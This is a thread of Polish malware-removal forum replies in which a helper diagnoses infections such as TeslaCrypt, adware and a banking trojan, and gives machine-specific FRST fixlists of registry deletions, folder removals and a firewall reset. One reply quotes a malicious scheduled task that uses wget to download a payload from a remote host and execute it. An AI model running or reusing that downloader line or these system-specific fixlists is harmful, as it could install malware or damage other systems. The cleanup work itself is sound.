picasso

Tak, pliki graficzne muszą być skojarzone z Picasą, by były otwierane za jej pomocą. Tu myślę, że już sobie poradzisz. Wszystko zrobione. Przechodzimy do fazy końcowej: 1. Przez SHIFT+DEL (usuwa z ominięciem Kosza) skasuj z Pulpitu folder FRST64. Następnie zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Po wyczyszczeniu punktów Przywrcania utwórz ręcznie punkt z bieżącej sytuacji po wyczyszczeniu systemu. 2. Podejmij się próby wykonania aktualizacji systemu do Windows 10 i zgłoś z wynikami, czy operacja przebiegła pomyślnie, czy wręcz przeciwnie.

Wszystko wykonane. Możesz usunąć plik C:\delfix.txt. Temat rozwiązany. Zamykam.

Owszem, można to wyłączyć, co sprowadzi się do tego, że Google Chrome przestanie się samodzielnie aktualizować (co samo w sobie nie jest złym pomysłem) oraz przestanie się pojawiać powiadomienie "Uzyskaj Windows 10". Czy ten tekst oznacza, że narzędzie deinstalacyjne Microsoftu nie widzi pozycji "Adobe Photoshop CS6"? Teraz dopiero zauważyłam, na liście zainstalowanych nie ma dopasowanej wersji Java: Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation) Java™ 6 Update 32 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216032FF}) (Version: 6.0.320 - Oracle) ArchiCAD 15 potrzebuje Java 6u23. Odinstaluj wszystkie widoczne Java (tak, wliczając najnowszą), zainstaluj tymczasowo wymaganą wersję i ponów akcję deinstalacji. Jeśli chodzi o najnowszą Java, to czy ona w ogóle tu jest potrzebna? Jedyna przeglądarka ją obsługująca to IE, Google Chrome w ogóle już nie obsługuje wtyczek Java, a za jakiś czas przestanie je obsługiwać także Firefox. I dopiero, gdy ArchiCAD zostanie poprawnie odinstalowany, zrób nowe logi FRST.

Wszystko pomyślnie wykonane, zgłoszony problem rozwiązany. Kończymy: 1. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\32788R22FWJFW RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\ComboFix RemoveDirectory: C:\Qoobox RemoveDirectory: C:\ProgramData\Splashtop RemoveDirectory: C:\Users\greeg\AppData\Roaming\Splashtop RemoveDirectory: C:\Users\greeg\Desktop\Stare dane programu Firefox RemoveDirectory: C:\Windows\erdnt CMD: del /q C:\Users\greeg\Desktop\1es68vz9.exe CMD: del /q C:\Users\greeg\Desktop\Addition.txt CMD: del /q C:\Users\greeg\Desktop\Fixlog.txt CMD: del /q C:\Users\greeg\Desktop\FRST.txt CMD: del /q C:\Users\greeg\Desktop\GMER.txt CMD: del /q C:\Users\greeg\Desktop\Shortcut.txt CMD: del /q C:\Windows\MBR.exe CMD: del /q C:\Windows\NIRCMD.exe CMD: del /q C:\Windows\PEV.exe CMD: del /q C:\Windows\SWREG.exe CMD: del /q C:\Windows\SWSC.exe CMD: del /q C:\Windows\sed.exe CMD: del /q C:\Windows\grep.exe CMD: del /q C:\Windows\zip.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu. Pokaż wynikowy fixlog.txt. Dopiero po jego pokazaniu: 2. Usuń z Pulpitu folder FRST, następnie jeszcze zastosuj DelFix. 3. Do aktualizacji także systemowy Internet Explorer, mimo że z niego nie korzystasz.

Proszę nie podbijaj tematu zbędnymi postami, odpowiadam gdy jestem w stanie. Usuwam też "świeże logi", one nic nie wnoszą do sprawy, są identyczne jak te poprzednie. W raportach bez zmian, nie wykonane do końca punkty 1+2, a McAfee niezmiennie aktywny. Prawie wszystkie programy, z wyjątkiem McAfee Security Scan Plus, nadal widoczne. Powtarzaj zadanie. McAfee ma być w pierwszej kolejności normalnie odinstalowany via Panel sterowania, po tym dopiero narzędzie usuwające, a jeśli jest problem z jego uruchomieniem, to z poziomu Trybu awaryjnego. I dopiero po tym zrób nowe raporty FRST.

Zestawienie nic nie wnosi do sprawy. Wszystkie warianty TeslaCrypt opisane tu: KLIK. Tylko najstarsze z nich (pliki .ecc, .ezz, .exx) można było odkodować, gdyż klucz był zapisywany na dysku twardym. I ten "błąd" właśnie "naprawiono" we wszystkich nowych wariantach, które już w ogóle nie zapisują klucza na dysku (jest w pamięci tylko tymczasowo podczas szyfrowania), dlatego nie jest możliwe odkodowanie plików. Akcja "Can only be decrypted if victim was able to capture the key being sent to the server at the time of encryption." nie aplikuje się u Ciebie, gdyż infekcja nie jest już czynna. Zresztą nie znam nawet żadnego przypadku, by komuś udało się wyłuskać z pamięci klucz, gdy infekcja była jeszcze aktywna.

Wszystko zostało pomyślnie usunięte. Czy są jeszcze jakieś problemy?

Obecna sytuacja jest następująca: klucze (unikatowe dla danej instalacji Windows, każdy ma inny klucz przypisany) są nieosiągalne i znane tylko przestępcom, a hasła nie są słabe, stąd złamanie ich przez atak typu "brute force" odpada. Dlatego też są bardzo nikłe szanse, że w przyszłości pojawi się jakaś "solucja", choć trudno przewidywać co będzie za X lat.

Zadanie wykonane. Na koniec: Usuń pobrane narzędzia i ich logi z folderów Nowy folder (4) + Nowy folder (5) na Pulpicie. Następnie zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Jak mówiłam, infekcja szyfrowała tylko określone pliki Autodesk, głównie szablony i dokmentację, co sprowadza się do tego, że sam program per se będzie działał, a jakiś brak ujawni się tylko w szczególnych zadaniach z wykorzystaniem np. tych szablonów.

Skoro problem ustąpił po Fixie, to wygląda na to, że problemem było jednak to wspominane przeze mnie proxy. Brakuje pliku Fixlog, który powstał podczas usuwania, dołącz go - jest w tym samym katalogu skąd uruchamiałeś FRST.

Logi z przestarzałego OTL nie są tu brane pod uwagę. Usuwam. Z Dzienika zdarzeń: Error: (12/07/2015 01:44:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: Explorer.EXE, wersja: 6.3.9600.17667, sygnatura czasowa: 0x54c6f7c2 Nazwa modułu powodującego błąd: phc64.dll, wersja: 4.4.3.1120, sygnatura czasowa: 0x549a921c Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000000000001ac9b Identyfikator procesu powodującego błąd: 0x83c Godzina uruchomienia aplikacji powodującej błąd: 0xExplorer.EXE0 Ścieżka aplikacji powodującej błąd: Explorer.EXE1 Ścieżka modułu powodującego błąd: Explorer.EXE2 Identyfikator raportu: Explorer.EXE3 Pełna nazwa pakietu powodującego błąd: Explorer.EXE4 Identyfikator aplikacji względem pakietu powodującego błąd: Explorer.EXE5 Moduł powodujący błąd to biblioteka należąca do Foxit PhantomPDF. Możliwe sposoby rozwiązania problemu: - W ShellExView x64 przez klik w kolumnę Company posortuj wpisy, tak by wszystkie niedomyślne (na różowym tle) wylądowały w jednym bloku. Wyszukaj wszystkie wpisy związane z Foxit, z prawokliku wyłącz i zresetuj system. - Lub całkowita deinstalacja Foxit PhantomPDF Dodatkowo, pozbądź się też programu WebStorage ASUSa. To aplikacja również znana z generowania podobnych problemów w eksploratorze. Ten z kolei jest niejasny: Error: (12/06/2015 07:36:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: GWXUX.exe, wersja: 6.3.9600.18064, sygnatura czasowa: 0x56042d8f Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.3.9600.18007, sygnatura czasowa: 0x55c4c16b Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000000000003d86e Identyfikator procesu powodującego błąd: 0x1c18 Godzina uruchomienia aplikacji powodującej błąd: 0xGWXUX.exe0 Ścieżka aplikacji powodującej błąd: GWXUX.exe1 Ścieżka modułu powodującego błąd: GWXUX.exe2 Identyfikator raportu: GWXUX.exe3 Pełna nazwa pakietu powodującego błąd: GWXUX.exe4 Identyfikator aplikacji względem pakietu powodującego błąd: GWXUX.exe5 Error: (12/06/2015 01:26:01 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: ) Proces GWXUX.exe należy do notyfikatora "Uzyskaj Windows 10". Ten błąd ostatecznie można powierzchownie usunąć z widoku deinstalując aktualizację KB3035583 wprowadzającą ten notyfikator. PS. W spoilerze drobne doczyszczanie odpadków adware i wpisów pustych, nie powiązane z powyższymi problemami.

Widoki na odkodowanie w przyszłości są zerowe. Ale oczywiście asekuracyjnie na wszelki wypadek kopiuje się cenne zaszyfrowane dane na zewnętrzny nośnik. Kontakt z przestępcami na własne ryzyko. Musisz ocenić czy te pliki rzeczywiście są aż tak ważne, by się wplątać w taką sytuację. Nie ma gwarancji, że otrzymasz działający klucz lub go w ogóle otrzymasz.

Wyląda na to, że brakuje jakiegoś pliku tej instalacji. Należy przeinstalować program. Czyli na teraz do wykonania następujące akcje: 1. Kolejne deinstalacje: - Zapomniałam podać poprzednio jeszcze jeden wpis do usunięcia za pomocą tego specjalnego narzędzia Microsoftu: Poczta usługi Windows Live - Odinstaluj Picasę, następnie ponownie zainstaluj z oficjalnego instalatora: KLIK. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~2\WIC4A1~1\MESSEN~1\MSGRAP~1.DLL Keine Datei Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~2\WIC4A1~1\MESSEN~1\MSGRAP~1.DLL Keine Datei Handler: wlmailhtml - {03C514A3-1EFB-4856-9F99-10D7BE1653C0} - C:\Program Files (x86)\Windows Live\Mail\mailcomm.dll Keine Datei IE Session Restore: HKU\S-1-5-21-1280836393-1798441447-3805755999-1000 -> ist aktiviert. DeleteKey: HKCU\Software\Clients\StartMenuInternet\Crossbrowse DeleteKey: HKCU\Software\Clients\StartMenuInternet\IEXPLORE.EXE DeleteKey: HKLM\SOFTWARE\Clients\Calendar DeleteKey: HKLM\SOFTWARE\Clients\Contacts\Windows Live Mail DeleteKey: HKLM\SOFTWARE\Clients\Internet Call\Skype DeleteKey: HKLM\SOFTWARE\Clients\Mail\Opera DeleteKey: HKLM\SOFTWARE\Clients\Mail\Windows Live Mail DeleteKey: HKLM\SOFTWARE\Clients\Media\RealOne Player DeleteKey: HKLM\SOFTWARE\Clients\News\Opera DeleteKey: HKLM\SOFTWARE\Clients\News\Windows Live Mail DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Maxthon3 DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Opera DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable DeleteKey: HKLM\SOFTWARE\RegisteredApplications\Maxthon3 Reg: reg add HKLM\SOFTWARE\Clients\StartMenuInternet /ve /t REG_SZ /d FIREFOX.EXE /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v Maxthon3 /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v "Opera Internet Browser" /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v "Opera Stable" /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v "Windows Calendar" /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v "Windows Live Mail" /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v "Windows Live Mail (News)" /f Reg: reg delete HKLM\SOFTWARE\RegisteredApplications /v "Windows Photo Gallery Viewer" /f RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Users\Aneczka\Doctor Web RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Entfernen (Fix). Będzie restart. Zaprezentuj wynikowy fixlog.txt. I potwierdź że Picasa działa po reinstalacji.

Fix FRST wykonany pomyślnie. Drobne poprawki potem. Jaki błąd? Ten sam związany z Java czy jakiś inny? Czy próbowałeś to narzędzie "Cleaner Tool" linkowane na błędzie? I może problemem jest skrzyżowanie instalacji, bo są aż dwie edycje Photoshopa: Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated) Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated) Jest prawdopodobne, że ze względu na współdzielone katalogi Adobe nie da się po prostu tego odinstalować, bo oznaczałoby to naruszenie nowszej edycji Photoshopa. W tej sytuacji zastosuj to samo narzędzie Microsoftu co poprzednio, by tylko usunąć rejestrację produktu (czyli zaznaczyć wpis Adobe Photoshop CS6). Klawisz z flagą Windows + X > Uruchom > taskschd.msc > wyłącz poniższe zadanie: Task: {3111C77E-3AD3-4F2F-A4C1-6078D0BE0072} - System32\Tasks\AdobeAAMUpdater-1.0-Natalka-Natalia => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-05-25] (Adobe Systems Incorporated)

Posty połączyłam, ale już teraz odpowiadaj w nowym poście. Stosowałeś już dużo skanerów: AdwCleaner, ComboFix oraz wątpliwy skaner z czarnej listy SpyHunter. Na dodatek Firefox był tu co dopiero resetowany oraz reinstalowany. Czy na pewno po tych akcjach problem nadal występuje? W raportach nie widać żadnych oczywistych oznak opisywanego zjawiska, pomimo że są pewne szczątki adware, choć zastanawia mnie ustawiona konfiguracja proxy unstopp.me. Czyli na teraz do wyczyszczenia proxy, wpisy odpadkowe i puste: 1. Odinstaluj stare wersje: Adobe AIR, Adobe Shockwave Player 12.1, Java 8 Update 31, Splashtop Connect for Firefox, Splashtop Connect IE, Windows Media Player Firefox Plugin. 2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files (x86)\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 3. Otwórz Notatnik i wklej w nim: CloseProcesses: S2 05837205; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserfasterSvc.dll",service S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2015-12-05] () S3 andnetndis; system32\DRIVERS\lgandnetndis64.sys [X] S2 AODDriver4.01; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] S3 ATICDSDr; \??\C:\Users\greeg\AppData\Local\Temp\ATICDSDr.sys [X] S3 dump_wmimmc; \??\E:\gry\NCSoft\Launcher\lineage2\system\GameGuard\dump_wmimmc.sys [X] S3 Frost_8_9_1_26; \??\E:\gry\LineageII PL\Frost\frost.sys [X] S3 Frost_9_12_1_3; \??\D:\gry\LineageII EU\Frost\frost.sys [X] S3 SANDRA; \??\C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2012.SP1\WNt500x64\Sandra.sys [X] Startup: C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\happy-new-year-pol-6080635.lnk [2015-04-01] Task: {1F7D4D60-AE4E-4345-A5F3-978A12A89B29} - System32\Tasks\{4C6D8442-2589-41EF-9B70-FA12BCBA98FD} => pcalua.exe -a G:\Freedom\Windows\98se-XP\setup.exe -d G:\Freedom\Windows\98se-XP Task: {2FEFCEF4-7AD6-46FE-AB84-4A424FB33FC9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000UA => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: {7B882036-178F-44F3-9559-CD475C424E9E} - System32\Tasks\{3731EC66-21EB-4B74-8399-30E486693067} => pcalua.exe -a "C:\Program Files (x86)\SimpleFiles\Uninstall.exe" Task: {9069A225-2E1E-4D10-AD0E-EAA6BE8A8277} - System32\Tasks\{FD044FBD-08A1-4ABF-B679-2861F21CE4FC} => pcalua.exe -a C:\Users\greeg\Desktop\ffdshow-tryouts-20061116-rev555\FFdshow-Tryouts-20061116-rev555.exe -d C:\Users\greeg\Desktop\ffdshow-tryouts-20061116-rev555 Task: {A641CB63-90FD-44CE-9C43-F858850E630C} - System32\Tasks\Sk-Enhancer-S-545697201 => c:\programdata\softsafe\sk-enhancer\Sk-Enhancer.exe Task: {FCE080F3-797E-4B00-A3B7-7DB03460B8A4} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000Core => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000Core.job => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2241001177-833195801-3504404126-1000UA.job => C:\Users\greeg\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\Sk-Enhancer-S-545697201.job => c:\programdata\softsafe\sk-enhancer\Sk-Enhancer.exeG/schedule /profile c:\programdata\softsafe\sk-enhancer\545697201.ini HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver" ShellIconOverlayIdentifiers: [AcronisSyncError] -> {934BC6C0-FEC2-4df5-A100-961DE2C8A0ED} => Brak pliku ShellIconOverlayIdentifiers: [AcronisSyncInProgress] -> {00F848DC-B1D4-4892-9C25-CAADC86A215D} => Brak pliku ShellIconOverlayIdentifiers: [AcronisSyncOk] -> {71573297-552E-46fc-BE3D-3DFAF88D47B7} => Brak pliku CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKU\S-1-5-21-2241001177-833195801-3504404126-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://houmpage.com/?src=hp&ssid=1449238210&a=1008661&uuid=3348a2f7-719d-4d38-9f6f-75c2ee2cbb06 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://search.v9.com/web/?utm_source=b&utm_medium=update&from=update&uid=ST3250410AS_9RY1XND7XXXX9RY1XND7&ts=4587589 SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://search.v9.com/web/?utm_source=b&utm_medium=update&from=update&uid=ST3250410AS_9RY1XND7XXXX9RY1XND7&ts=4587589 SearchScopes: HKU\S-1-5-21-2241001177-833195801-3504404126-1000 -> {73B8C233-6941-4733-8451-9AE80A13752F} URL = hxxp://www.google.com/cse?cx=partner-pub-3794288947762788%3A7941509802&ie=UTF-8&q=&sa=Search&siteurl=www.google.com%2Fcse%2Fhome%3Fcx%3Dpartner-pub-3794288947762788%3A7941509802&q={searchTerms} SearchScopes: HKU\S-1-5-21-2241001177-833195801-3504404126-1000 -> {C896B776-4694-4b7a-ACCD-7132EC9720B9} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=IEBDSV SearchScopes: HKU\S-1-5-21-2241001177-833195801-3504404126-1000 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1449238210&a=1008661&uuid=3348a2f7-719d-4d38-9f6f-75c2ee2cbb06 FF Plugin-x32: @esn/esnlaunch,version=1.104.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.104.0\npesnlaunch.dll [brak pliku] FF Plugin-x32: @esn/esnlaunch,version=1.116.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.116.0\npesnlaunch.dll [brak pliku] FF Plugin-x32: @esn/esnlaunch,version=1.122.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.122.0\npesnlaunch.dll [brak pliku] FF Plugin-x32: @esn/esnlaunch,version=2.1.3 -> C:\Program Files (x86)\Battlelog Web Plugins\2.1.3\npesnlaunch.dll [brak pliku] FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [brak pliku] FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF Plugin HKU\S-1-5-21-2241001177-833195801-3504404126-1000: @tools.google.com/Google Update;version=3 -> C:\Users\greeg\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll [brak pliku] FF Plugin HKU\S-1-5-21-2241001177-833195801-3504404126-1000: @tools.google.com/Google Update;version=9 -> C:\Users\greeg\AppData\Local\Google\Update\1.3.26.9\npGoogleUpdate3.dll [brak pliku] C:\ProgramData\Temp C:\ProgramData\Microsoft\Windows\GameExplorer\{E8AE0286-9A63-4F4F-B479-0E4E4A2A8EB5} C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo III\Diablo III - Instrukcja.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo III\Pomoc techniczna Blizzard.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo III\Zarządzanie kontem Battle.net.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Tanks C:\Users\greeg\AppData\Local\dt.dat C:\Users\greeg\AppData\Roaming\Enigma Software Group C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BeamNG-Techdemo-0.3 C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\I-Doser v4 C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ModPack by DjVirusPL LITE 0.8.9 v6 - No Hitboxes C:\Users\greeg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\XVM 5.0.1-test3 conf by DjVirusPL 0.8.9 v5 C:\Users\greeg\Desktop\Rangi TeamSpeak3\Rangi TeamSpeak3\ikony ts\icon\ikony\ikony — skrót.lnk C:\Users\greeg\Desktop\XBOX\JungleFlasher.exe — skrót.lnk C:\Windows\System32\DRIVERS\EsgScanner.sys Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\4game-service" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Google Update" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LightScribe Control Panel" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mobilegeni daemon" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MouseDriver" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\NextLive" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\se" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ZyngaGamesAgent" /f CMD: netsh advfirewall reset RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition ale już bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się dokładnie czy problemy nadal występują.

Tu jest dobre zestawienie: KLIK. Sterowniki te miała usunąć deinstalacja oprogramowania HP. Na wszelki wypadek zrób mi nowy log FRST po tych wszystkich deinstalacjach na następującym ustawieniu: w sekcji Filtrowanie odznaczone pozycje Usługi + Sterowniki, zaznaczone też pole Addition. Poproszę o wyciąg klucza pokazujący dokładny build. Otwórz Notatnik i wklej w nim: Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Wprawdzie poprzednie infekcje usunięte, ale pojawił się nowy problem odpowiadający podanym obrazkom. W katalogu Autostart powstało dużo podejrzanych obiektów, które wyglądają na pochodną tego już usuniętego skryptu CsBoostMs.vbs. A całość wygląda na jakiś niepożądany crack do gry. Ostatnio pobrane pliki to: 2015-11-30 15:51 - 2015-11-30 15:51 - 28121598 _____ C:\Users\Pawel\Desktop\csgomod-1511271841-de_alexandra.dem 2015-11-30 15:50 - 2015-11-30 15:50 - 04184700 _____ C:\Users\Pawel\Downloads\csgomod-1511271841-de_alexandra-1448646060-1448655240.zip Kolejne podejście: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bin [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Counter-Strike 1.6.exe.upk [2015-12-05] (CS-Boost.pl) Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Csboost.upk [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\motd_temp.html [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssvx.asi.upk [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssvx.dll.upk [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SAVE [2015-12-05] () Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\slowhack.ini.upk [2015-12-05] () Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, by nie zablokował FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart i powstanie kolejny fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

W systemie jest infekcja w rodzaju VBKlip/Banatrix: Task: {7B119518-1A81-407A-9AA5-2026656037FF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grigle.in/index.php?data=FLBXfL38mG;Minecraft_1.8.1_Setup.exe;1434626853 & start cmd /R dat.bmp Ale to nie wygląda na przyczynę problemów, bo opis (o ile nie ma przekłamań) wskazuje, że problem z ruzruchem występuje znacznie wcześniej w fazie sprzętowo-sterownikowej niż zaczyna działać podany wpis. W Dzienniku zdarzeń powtarzają się błędy związane z oprogramowaniem grafiki nVidia: Dziennik System: ============= Error: (12/06/2015 04:11:52 PM) (Source: Service Control Manager) (EventID: 7016) (User: ) Description: Usługa NVIDIA Display Driver Service zaraportowała nieprawidłowy stan bieżący 32. Nie wykluczam też ingerencji Kaspersky Internet Security (bardzo rozbudowany układ sterowników). Na razie usuń infekcję: 1. Deinstalacje: - Przez Panel sterowania odinstaluj zbędnik Browser Configuration Utility. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadek Dropbox Update Helper > Dalej. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {087A29B3-E8A4-4EBE-920B-86951319A89D} - System32\Tasks\{47CD3A0E-294D-44A6-A0FE-276285D6B5E9} => C:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe Task: {0F57977C-987B-4DED-B56B-BD5D35980545} - System32\Tasks\{05F506B7-F212-4107-827F-666EC3492888} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2\EAUninstall.exe" Task: {1706BF99-B122-424E-983A-42516E8E9F47} - System32\Tasks\{D7F62B37-8A1F-49FF-8C0C-516B3AE041FC} => E:\Gry\bin\settlershok.exe Task: {1E130E74-AB89-473E-A51B-0475A71B81D7} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2015-08-26] (Dropbox, Inc.) Task: {297ECF24-AE9F-4C4F-837F-D93D8247DC18} - System32\Tasks\{068C6815-68CF-42D3-9AA5-31E646CE26A2} => pcalua.exe -a "C:\Program Files\EA GAMES\The Sims 2 University\TSBin\TS2UPD.exe" -d "C:\Program Files\EA GAMES\The Sims 2 University\TSBin" Task: {3D9B50B3-5C9E-4557-80F4-DDBA014DAE87} - System32\Tasks\{17E5DB57-5BC8-4807-9B53-137529101CD3} => C:\Program Files\EA 